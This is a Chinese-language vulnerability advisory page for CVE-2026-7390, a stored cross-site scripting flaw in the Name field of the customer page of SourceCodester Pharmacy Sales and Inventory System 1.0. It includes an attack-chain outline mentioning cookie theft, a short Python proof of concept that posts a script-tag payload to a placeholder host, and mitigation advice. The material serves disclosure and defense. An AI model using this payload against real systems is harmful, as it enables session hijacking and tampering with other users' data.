CVE-2026-7390 CVSS 3.5 低危

CVE-2026-7390 SourceCodester药店系统XSS漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7390

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Pharmacy Sales and Inventory System 1.0

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0版本中存在安全漏洞。该漏洞位于/index.php?page=customer文件的Customer函数中。由于对参数Name缺乏适当的过滤和验证，攻击者可以通过注入恶意脚本代码导致跨站脚本攻击（XSS）。攻击者可利用此漏洞在受害者浏览器中执行恶意代码，窃取Cookie或进行钓鱼攻击。该漏洞利用难度较低，且攻击代码已公开，对系统安全性构成一定威胁。

技术细节

该漏洞属于典型的输入验证缺失导致的跨站脚本攻击。在SourceCodester Pharmacy Sales and Inventory System 1.0中，当系统管理员或授权用户访问Customer管理功能（通过/index.php?page=customer）提交或修改客户信息时，后端未对“Name”参数进行严格的输入过滤和转义处理。攻击者可以构造包含JavaScript代码的恶意数据（如<script>alert(1)</script>）作为Name参数的值发送至服务器。服务器将此恶意数据直接存储在数据库中。当其他具有低权限的用户或管理员访问受影响的客户列表页面时，存储在数据库中的恶意脚本会在其浏览器上下文中渲染并执行。由于CVSS向量显示UI:R（需要用户交互）和PR:L（需要低权限），攻击通常需要诱导用户访问特定页面或进行点击操作。该漏洞主要影响数据的完整性（I:L），可能导致会话劫持或恶意操作。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别出目标正在使用SourceCodester Pharmacy Sales and Inventory System 1.0，并确认Customer功能入口。

STEP 2

步骤2：构造Payload

攻击者构造恶意JavaScript代码（如窃取Cookie的脚本），并将其封装在HTML标签中。

STEP 3

步骤3：发送恶意请求

攻击者利用低权限账号，向/index.php?page=customer接口发送POST请求，在Name参数中注入恶意Payload。

STEP 4

步骤4：触发漏洞

当管理员或其他用户查看客户列表页面时，浏览器解析并执行注入的恶意脚本，导致攻击生效。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "http://target-ip/index.php?page=customer"

# Payload for XSS
payload = "<script>alert('CVE-2026-7390');</script>"

# Data to be sent
data = {
    "Name": payload,
    # Add other necessary parameters if required by the form (e.g., address, contact info)
}

try:
    # Send POST request to inject the payload
    response = requests.post(target_url, data=data)
    
    if response.status_code == 200:
        print("Payload sent successfully. Check the customer list page for XSS execution.")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施

在未获得官方修复补丁前，建议管理员暂时禁用Customer模块的新增和修改功能，或通过代理服务器（如Nginx）对传入的Name参数进行清洗，过滤掉'<', '>', 'script'等特殊字符。同时，加强对系统操作日志的监控，防止被恶意利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7390
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7390
3 Details https://www.cvedetails.com/cve/CVE-2026-7390/
4 VulDB https://vuldb.com/cve/CVE-2026-7390
5 Link https://github.com/microwaveabi/vul/issues/4
6 Link https://vuldb.com/submit/803105
7 Link https://vuldb.com/vuln/360115
8 Link https://vuldb.com/vuln/360115/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表